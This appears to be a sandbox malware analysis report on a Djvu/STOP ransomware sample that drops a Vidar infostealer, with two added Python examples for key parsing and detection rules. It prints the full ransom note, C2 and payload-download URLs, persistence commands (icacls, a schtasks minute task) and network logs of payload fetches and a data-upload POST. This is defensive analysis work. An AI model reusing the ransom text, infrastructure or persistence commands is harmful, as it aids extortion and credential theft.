Analysis

  • max time kernel
    144s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    16/07/2023, 12:15 UTC

General

  • Target

    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe

  • Size

    812KB

  • MD5

    73ecaf10be2b83a9a1e77d3235865eac

  • SHA1

    3236e7d9b443a757dbc4dcf902d78c2f8dfaebed

  • SHA256

    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd

  • SHA512

    b2c9df901501146d740c0449d3424f2782307463cb5743ca5d03db2714e6d0291d7c66b9b85c55ab4f14a975ae4da429218fbc3bf41cf2f9747a6f3aaca28988

  • SSDEEP

    12288:2LQHLjpgE7N1EqephL/prRX54Svv9otwos0CBre7/6eai0Ir7FO:jfSExZephLVRWSv9obsxVhXIPFO

Malware Config

Extracted

Family

djvu

C2

http://zexeq.com/raud/get.php

Attributes
  • extension

    .miqe

  • offline_id

    1S27jnaC9TYNiwf9VvJvIx5XCXvgyoDAUXHnu0t1

  • payload_url

    http://colisumy.com/dl/build2.exe

    http://zexeq.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-nSxayRgUNO Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0746Pokj

rsa_pubkey.plain

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAukXugPTesVa0dtaWNiiu
4WMemiJx4CJUEs31fQDvf3FsFaYPbh9w3XBnaye01J8sv2OBu/6x+PnFoEgf32Ae
jUlsScweikBv6CaF//njiz9RaWBWvoxi/G7mSGGEnT64gMDw2werxlov8rdkm6yH
ASSmUH0Lv3tfuQNAlhAXHB3HtdCVA8l2OID2mf2bFCeMVBavvp/bcBtZknAWicEl
dkHfJMJ0Dt92Pj96zQzNLWPXaR4FCtu44xLSPOsEML6CbYqIjlnMVYHThwLeTeCU
s6Of9HYSNQPsWgN8fNnoJo0rsOqcEFVgrKdCr4wsUdqkAZ0qFVSE3yL+DV0jgWt2
BQIDAQAB
-----END PUBLIC KEY-----

Extracted

Family

vidar

Version

4.7

Botnet

https://t.me/eagl3z

C2

https://t.me/eagl3z

https://steamcommunity.com/profiles/76561199159550234

Attributes
  • profile_id_v2

    https://t.me/eagl3z

  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
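
The two values in the Djvu config that decide whether a victim can ever recover files are the RSA public key and the offline_id. The Python below is an added example, not part of the Triage report: it parses the extracted PEM by hand (a small DER walker over the SubjectPublicKeyInfo, standard library only, so it runs on a bare analysis box) to confirm the key really is a 2048-bit rsaEncryption key with public exponent 65537, and it applies the STOP/Djvu ID convention that IDs ending in "t1" were produced with the hard-coded offline key rather than a per-victim key fetched from the C2, which is what public STOP decryptors rely on. The PEM and offline_id constants are copied from the config above; the function names and the check itself are this example's own.

```python
"""Triage helpers for the extracted Djvu config (added example, not Triage's code)."""
import base64

# Copied verbatim from the rsa_pubkey.plain value in the extracted config.
DJVU_PUBKEY_PEM = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAukXugPTesVa0dtaWNiiu
4WMemiJx4CJUEs31fQDvf3FsFaYPbh9w3XBnaye01J8sv2OBu/6x+PnFoEgf32Ae
jUlsScweikBv6CaF//njiz9RaWBWvoxi/G7mSGGEnT64gMDw2werxlov8rdkm6yH
ASSmUH0Lv3tfuQNAlhAXHB3HtdCVA8l2OID2mf2bFCeMVBavvp/bcBtZknAWicEl
dkHfJMJ0Dt92Pj96zQzNLWPXaR4FCtu44xLSPOsEML6CbYqIjlnMVYHThwLeTeCU
s6Of9HYSNQPsWgN8fNnoJo0rsOqcEFVgrKdCr4wsUdqkAZ0qFVSE3yL+DV0jgWt2
BQIDAQAB
-----END PUBLIC KEY-----"""

# Copied verbatim from the offline_id attribute in the extracted config.
DJVU_OFFLINE_ID = "1S27jnaC9TYNiwf9VvJvIx5XCXvgyoDAUXHnu0t1"

RSA_ENCRYPTION_OID = bytes.fromhex("2a864886f70d010101")  # 1.2.840.113549.1.1.1


def _tlv(buf: bytes, pos: int = 0):
    """Decode one DER tag-length-value at `pos`; return (tag, value, end_offset)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_rsa_spki(pem: str) -> dict:
    """Parse a PEM SubjectPublicKeyInfo and return the RSA modulus size and exponent.

    Structure walked: SEQUENCE { SEQUENCE { OID rsaEncryption, NULL },
                                 BIT STRING { SEQUENCE { INTEGER n, INTEGER e } } }
    """
    body = "".join(line for line in pem.splitlines() if not line.startswith("-----"))
    der = base64.b64decode(body)

    tag, spki, _ = _tlv(der)
    if tag != 0x30:
        raise ValueError("outer element is not a SEQUENCE")
    tag, alg, after_alg = _tlv(spki)                 # AlgorithmIdentifier
    oid_tag, oid, _ = _tlv(alg)
    if oid_tag != 0x06 or oid != RSA_ENCRYPTION_OID:
        raise ValueError("key algorithm is not rsaEncryption")
    tag, bitstr, _ = _tlv(spki, after_alg)           # subjectPublicKey BIT STRING
    if tag != 0x03 or bitstr[0] != 0:
        raise ValueError("malformed BIT STRING (unused-bits byte must be 0)")
    _, rsapub, _ = _tlv(bitstr[1:])                  # RSAPublicKey SEQUENCE
    _, n_bytes, after_n = _tlv(rsapub)
    _, e_bytes, _ = _tlv(rsapub, after_n)
    n = int.from_bytes(n_bytes, "big")
    e = int.from_bytes(e_bytes, "big")
    return {"modulus_bits": n.bit_length(), "exponent": e, "modulus": n}


def is_offline_id(victim_id: str) -> bool:
    """STOP/Djvu victim IDs ending in 't1' were generated with the embedded offline key."""
    return victim_id.endswith("t1")


def triage_config() -> dict:
    """Summarise what the extracted config tells a responder about recoverability."""
    key = parse_rsa_spki(DJVU_PUBKEY_PEM)
    return {
        "rsa_bits": key["modulus_bits"],
        "rsa_exponent": key["exponent"],
        "offline_id": DJVU_OFFLINE_ID,
        "offline_key_used": is_offline_id(DJVU_OFFLINE_ID),
    }


if __name__ == "__main__":
    print(triage_config())
```

An offline ID is good news for a victim: the per-build offline key is shared by every infection of that build, so once it is known to a decryptor project the ".miqe" files encrypted with it can be recovered; files encrypted under an online (C2-issued) key cannot.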

Signatures

  • Detected Djvu ransomware 17 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    "C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1176
    • C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
      "C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"
      2⤵
      • Checks computer location settings
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:540
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Users\Admin\AppData\Local\211697e2-eae8-42ec-8785-08c77492616d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        3⤵
        • Modifies file permissions
        PID:2740
      • C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
        "C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe" --Admin IsNotAutoStart IsNotTask
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3908
        • C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
          "C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Checks computer location settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5008
          • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe
            "C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4596
            • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe
              "C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:908
          • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build3.exe
            "C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build3.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2104
            • C:\Windows\SysWOW64\schtasks.exe
              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
              6⤵
              • Creates scheduled task(s)
              PID:1040
  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2832
    • C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
      2⤵
      • Creates scheduled task(s)
      PID:5040
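
The process tree above carries four command-line patterns that are worth turning into host detections: the icacls call that denies Everyone (S-1-1-0) delete rights on the GUID-named folder holding the sample's own copy, the self-relaunch with "--Admin IsNotAutoStart IsNotTask", the scheduled task that re-runs mstsca.exe out of AppData\Roaming every minute, and payloads executing from a GUID-named directory directly under AppData\Local. The Python below is an added example, not part of the Triage report: the rules are this example's own, and the Sysmon-style Event ID 1 records are constructed here from the command lines shown above, with two benign events (a nightly schtasks job and notepad) added to show the rules stay quiet on ordinary activity.

```python
"""Process-creation rules for the command lines in the process tree (added example)."""
import re
from typing import Dict, List, Tuple

SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"
GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"

# (rule name, regex on the image path, regex on the command line); both must match.
RULES = [
    # icacls denying Everyone (S-1-1-0) delete / delete-child on a folder, which the
    # sample does to the GUID-named folder holding its own copy.
    ("djvu_deny_everyone_acl", r"\\icacls\.exe$",
     r"/deny\s+\*S-1-1-0:\(OI\)\(CI\)\(DE,DC\)"),
    # Self-relaunch switches used by the Djvu/STOP loader.
    ("djvu_admin_relaunch", r"\.exe$",
     r"--Admin\s+IsNotAutoStart\s+IsNotTask\b"),
    # A task that fires every minute and runs something out of AppData\Roaming.
    ("minute_task_to_roaming_appdata", r"\\schtasks\.exe$",
     r'/create\b.*?/sc\s+minute\s+/mo\s+1\b.*?/tr\s+"[^"]*\\AppData\\Roaming\\'),
    # Any executable started from a GUID-named directory directly under AppData\Local.
    ("exec_from_guid_dir_in_local_appdata",
     r"\\AppData\\Local\\" + GUID + r"\\[^\\]+\.exe$", r"."),
]
COMPILED = [(n, re.compile(i, re.I), re.compile(c, re.I)) for n, i, c in RULES]

# Constructed Sysmon-style Event ID 1 records mirroring the tree above, plus two benign ones.
EVENTS: List[Dict] = [
    {"pid": 2740, "image": r"C:\Windows\SysWOW64\icacls.exe",
     "cmdline": r'icacls "C:\Users\Admin\AppData\Local\211697e2-eae8-42ec-8785-08c77492616d" /deny *S-1-1-0:(OI)(CI)(DE,DC)'},
    {"pid": 3908, "image": SAMPLE,
     "cmdline": f'"{SAMPLE}" --Admin IsNotAutoStart IsNotTask'},
    {"pid": 4596, "image": r"C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe"'},
    {"pid": 1040, "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"'},
    {"pid": 7001, "image": r"C:\Windows\System32\schtasks.exe",    # benign nightly job (constructed)
     "cmdline": r'schtasks /create /sc daily /st 02:00 /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe"'},
    {"pid": 7002, "image": r"C:\Windows\System32\notepad.exe",     # benign (constructed)
     "cmdline": r'"C:\Windows\System32\notepad.exe" notes.txt'},
]


def classify(event: Dict) -> List[str]:
    """Names of every rule whose image and command-line patterns both match the event."""
    return [name for name, img_re, cmd_re in COMPILED
            if img_re.search(event["image"]) and cmd_re.search(event["cmdline"])]


def scan(events: List[Dict]) -> List[Tuple[int, str]]:
    """Run all rules over all events; returns (pid, rule) pairs in event order."""
    return [(ev["pid"], rule) for ev in events for rule in classify(ev)]


if __name__ == "__main__":
    for pid, rule in scan(EVENTS):
        print(f"PID {pid}: {rule}")
```

Note that the schtasks command line is matched on its arguments only (the captured line above starts with "/C /create", not with "schtasks"), so the rule keys on the image path for the binary and on the arguments for the schedule and target.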

Network

  • flag-us
    DNS
    126.50.247.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    126.50.247.8.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    2.136.104.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.136.104.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    api.2ip.ua
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    8.8.8.8:53
    Request
    api.2ip.ua
    IN A
    Response
    api.2ip.ua
    IN A
    162.0.217.254
  • flag-nl
    GET
    https://api.2ip.ua/geo.json
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    162.0.217.254:443
    Request
    GET /geo.json HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: api.2ip.ua
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Sun, 16 Jul 2023 12:15:40 GMT
    Server: Apache
    Strict-Transport-Security: max-age=63072000; preload
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block; report=...
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
    Upgrade: h2,h2c
    Connection: Upgrade
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    254.217.0.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    254.217.0.162.in-addr.arpa
    IN PTR
    Response
    254.217.0.162.in-addr.arpa
    IN PTR
    nondutiable-rshinitrdns.web-hosting.com
  • flag-us
    DNS
    101.14.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    101.14.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    101.15.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    101.15.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    208.194.73.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    208.194.73.20.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    GET
    https://api.2ip.ua/geo.json
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    162.0.217.254:443
    Request
    GET /geo.json HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: api.2ip.ua
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Sun, 16 Jul 2023 12:15:52 GMT
    Server: Apache
    Strict-Transport-Security: max-age=63072000; preload
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block; report=...
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
    Upgrade: h2,h2c
    Connection: Upgrade
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    colisumy.com
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    8.8.8.8:53
    Request
    colisumy.com
    IN A
    Response
    colisumy.com
    IN A
    189.245.23.185
    colisumy.com
    IN A
    211.171.233.126
    colisumy.com
    IN A
    201.124.98.97
    colisumy.com
    IN A
    123.140.161.243
    colisumy.com
    IN A
    211.53.230.67
    colisumy.com
    IN A
    220.82.134.215
    colisumy.com
    IN A
    151.251.31.98
    colisumy.com
    IN A
    154.182.153.162
    colisumy.com
    IN A
    189.232.51.144
    colisumy.com
    IN A
    80.210.25.252
  • flag-mx
    GET
    http://colisumy.com/dl/build2.exe
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    189.245.23.185:80
    Request
    GET /dl/build2.exe HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: colisumy.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 16 Jul 2023 12:15:53 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
    Last-Modified: Mon, 10 Jul 2023 14:24:53 GMT
    ETag: "6fc00-60022bf0382f8"
    Accept-Ranges: bytes
    Content-Length: 457728
    Connection: close
    Content-Type: application/octet-stream
  • flag-us
    DNS
    zexeq.com
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    8.8.8.8:53
    Request
    zexeq.com
    IN A
    Response
    zexeq.com
    IN A
    196.188.169.138
    zexeq.com
    IN A
    187.156.105.40
    zexeq.com
    IN A
    109.175.29.39
    zexeq.com
    IN A
    62.217.232.10
    zexeq.com
    IN A
    201.119.15.212
    zexeq.com
    IN A
    190.219.153.101
    zexeq.com
    IN A
    190.187.52.42
    zexeq.com
    IN A
    211.40.39.251
    zexeq.com
    IN A
    211.171.233.129
    zexeq.com
    IN A
    222.236.49.123
  • flag-et
    GET
    http://zexeq.com/raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=true
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    196.188.169.138:80
    Request
    GET /raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=true HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: zexeq.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 16 Jul 2023 12:15:53 GMT
    Server: Apache/2.4.37 (Win64) PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Content-Length: 563
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    185.23.245.189.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    185.23.245.189.in-addr.arpa
    IN PTR
    Response
    185.23.245.189.in-addr.arpa
    IN PTR
    host-185-23-static-245-189.uninet-ide.com.mx
  • flag-us
    DNS
    138.169.188.196.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    138.169.188.196.in-addr.arpa
    IN PTR
    Response
  • flag-et
    GET
    http://zexeq.com/files/1/build3.exe
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    196.188.169.138:80
    Request
    GET /files/1/build3.exe HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: zexeq.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 16 Jul 2023 12:15:56 GMT
    Server: Apache/2.4.37 (Win64) PHP/5.6.40
    Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
    ETag: "2600-5c86757379380"
    Accept-Ranges: bytes
    Content-Length: 9728
    Connection: close
    Content-Type: application/x-msdownload
  • flag-us
    DNS
    t.me
    build2.exe
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-nl
    GET
    https://t.me/eagl3z
    build2.exe
    Remote address:
    149.154.167.99:443
    Request
    GET /eagl3z HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
    Host: t.me
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Sun, 16 Jul 2023 12:15:58 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12323
    Connection: keep-alive
    Set-Cookie: stel_ssid=37db46294837fb98ba_1894581439611601703; expires=Mon, 17 Jul 2023 12:15:58 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • flag-de
    GET
    http://128.140.92.122:8081/cbd613607c301b91658bcf8a9e38cc6a
    build2.exe
    Remote address:
    128.140.92.122:8081
    Request
    GET /cbd613607c301b91658bcf8a9e38cc6a HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
    Host: 128.140.92.122:8081
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Jul 2023 12:15:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    GET
    http://128.140.92.122:8081/files.zip
    build2.exe
    Remote address:
    128.140.92.122:8081
    Request
    GET /files.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
    Host: 128.140.92.122:8081
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Jul 2023 12:15:58 GMT
    Content-Type: application/zip
    Content-Length: 2685679
    Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
    Connection: keep-alive
    ETag: "631f30d3-28faef"
    Accept-Ranges: bytes
  • flag-de
    POST
    http://128.140.92.122:8081/
    build2.exe
    Remote address:
    128.140.92.122:8081
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----7708045882433214
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
    Host: 128.140.92.122:8081
    Content-Length: 157337
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Jul 2023 12:16:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    99.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.249.124.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.249.124.192.in-addr.arpa
    IN PTR
    Response
    22.249.124.192.in-addr.arpa
    IN PTR
    cloudproxy10022.sucuri.net
  • flag-us
    DNS
    122.92.140.128.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    122.92.140.128.in-addr.arpa
    IN PTR
    Response
    122.92.140.128.in-addr.arpa
    IN PTR
    static.122.92.140.128.clients.your-server.de
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    254.109.26.67.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    254.109.26.67.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    63.13.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    63.13.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    202.74.101.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    202.74.101.95.in-addr.arpa
    IN PTR
    Response
    202.74.101.95.in-addr.arpa
    IN PTR
    a95-101-74-202.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    5.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 162.0.217.254:443
    https://api.2ip.ua/geo.json
    tls, http
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    1.0kB
    8.1kB
    14
    10

    HTTP Request

    GET https://api.2ip.ua/geo.json

    HTTP Response

    429
  • 162.0.217.254:443
    https://api.2ip.ua/geo.json
    tls, http
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    1.2kB
    8.2kB
    17
    12

    HTTP Request

    GET https://api.2ip.ua/geo.json

    HTTP Response

    429
  • 189.245.23.185:80
    http://colisumy.com/dl/build2.exe
    http
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    16.0kB
    471.8kB
    345
    344

    HTTP Request

    GET http://colisumy.com/dl/build2.exe

    HTTP Response

    200
  • 196.188.169.138:80
    http://zexeq.com/raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=true
    http
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    412 B
    979 B
    6
    5

    HTTP Request

    GET http://zexeq.com/raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=true

    HTTP Response

    200
  • 196.188.169.138:80
    http://zexeq.com/files/1/build3.exe
    http
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    692 B
    10.5kB
    13
    12

    HTTP Request

    GET http://zexeq.com/files/1/build3.exe

    HTTP Response

    200
  • 149.154.167.99:443
    https://t.me/eagl3z
    tls, http
    build2.exe
    1.5kB
    19.4kB
    24
    20

    HTTP Request

    GET https://t.me/eagl3z

    HTTP Response

    200
  • 128.140.92.122:8081
    http://128.140.92.122:8081/
    http
    build2.exe
    269.4kB
    2.8MB
    2119
    2064

    HTTP Request

    GET http://128.140.92.122:8081/cbd613607c301b91658bcf8a9e38cc6a

    HTTP Response

    200

    HTTP Request

